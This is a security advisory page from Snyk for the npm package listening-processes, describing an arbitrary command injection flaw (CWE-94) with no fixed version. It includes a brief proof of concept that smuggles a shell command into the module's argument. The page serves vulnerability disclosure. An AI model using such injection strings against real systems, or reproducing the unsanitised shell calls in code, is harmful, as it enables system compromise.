Arbitrary Code Injection Affecting listening-processes package, versions *


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-LISTENINGPROCESSES-544025
  • published 3 Feb 2020
  • disclosed 2 Feb 2020
  • credit notpwnguy

Introduced: 2 Feb 2020

CVE NOT AVAILABLE CWE-94 Open this link in a new tab

How to fix?

There is no fixed version for listening-processes.

Overview

listening-processes is a simple NPM module for retrieving pertinent info on processes which are listening on local ports, and for killing those processes using shell commands in the background.

Affected versions of this package are vulnerable to Arbitrary Code Injection. An attacker can execute arbitrary commands by escaping the binaries used by the module since it uses bash commands.

PoC

$ node
> const processes = require('listening-processes')
> processes(`'Python && whoami >> hh;'`)
/bin/sh: \s.*:[0-9]* (LISTEN): command not found
{ Python:
   [ { command: 'Python',
       pid: '14720',
       port: '8000',
       invokingCommand:
        '/usr/local/Cellar/python/3.7.0/Frameworks/Python.framework/Versions/3.7/Resources/Python.app/Contents/MacOS/Python -m http.server' } ] }

References

CVSS Scores

version 3.1
Expand this section

Snyk

9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High